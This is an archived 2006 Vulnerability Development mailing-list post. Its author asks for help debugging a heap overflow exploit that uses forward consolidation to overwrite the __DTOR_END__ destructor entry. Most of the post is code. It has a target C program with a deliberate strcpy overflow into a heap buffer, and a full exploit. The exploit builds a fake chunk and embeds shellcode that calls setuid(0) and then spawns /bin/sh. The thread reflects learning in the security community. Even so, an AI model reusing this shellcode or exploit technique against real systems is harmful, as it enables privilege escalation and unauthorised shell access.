Vulnerability Development mailing list archives
heap overflow foreward consolidation
From: padre () correo ugr es
Date: Sat, 27 May 2006 01:27:26 +0200 (MEST)
Hi, im coding a heap verflow & exploit using foreward consolidation. I've been days looking at the code,but i didnt see nothing wrong. Why my xploit do not work? I think the fake chunk is constructed correctly, the padding is ok, the size is ok. Guys,can u tell me if the code is ok?? Maybe I forgotted something important (dont think so :-P) Thanks in advance!! -[ DTOR INFO]----------------------------------------------- mooo@localhost:~$ nm a | grep DTOR 080497e4 d __DTOR_END__ 080497e0 d __DTOR_LIST__ ------------------------------------------------------------ THIS IS THE BUGGY CODE ------------------------------------------------------------ #include <stdlib.h> #include <string.h> #include <stdio.h> int main (int argc, char **argv) { char *p,*p2; p = (char*)malloc(250); p2 = (char*)malloc(250); long *dtor_list = 0x080497e0; long *dtor_end = 0x080497e4; if (p && p2) printf("OK\n\n"); else exit(-1); printf ("p1 @ 0x%08x \n", p); printf ("p2 @ 0x%08x \n", p2); strcpy(p,argv[1]); free(p); printf ("dtors_list @ 0x%08x = 0x%08x \n", dtor_list, *dtor_list); printf ("dtors_end @ 0x%08x = 0x%08x \n ", dtor_end, *dtor_end); return 0; } ---------------------------------------------------------- THIS IS THE EXPLOIT ---------------------------------------------------------- #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #define TRASH 0xffffffff #define FLAG 0x1 int SIZE=(256+16); int main (int argc, char **argv){ char buffer[SIZE+1]; char sc[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; char *environ[]={sc,NULL}; long shellcode_addr = 0xbffffffa - strlen(sc) - strlen("./a"); long dtor_addr=0x080497e4; memset (buffer,'A',SIZE); *(int*)&buffer[(SIZE-16)] = (TRASH & ~FLAG); *(int*)&buffer[(SIZE-12)] = -4; *(int*)&buffer[(SIZE-8)] = (dtor_addr - 12); *(int*)&buffer[(SIZE-4)] = (shellcode_addr + 8); *(int*)&buffer[SIZE]='\0'; printf("-| Shellcode (%d bytes) @ 0x%08x\n",strlen(sc),shellcode_addr); printf("-|-----------------------------------\n"); printf("-| DTOR_END @ 0x%08x\n", dtor_addr); if ( execle("./a","a",buffer,environ) < 0) { perror ("execle "); } printf("something wrong :-S \n"); return 0; } --------------------------------------------------------------------------
Current thread:
- heap overflow foreward consolidation padre (May 29)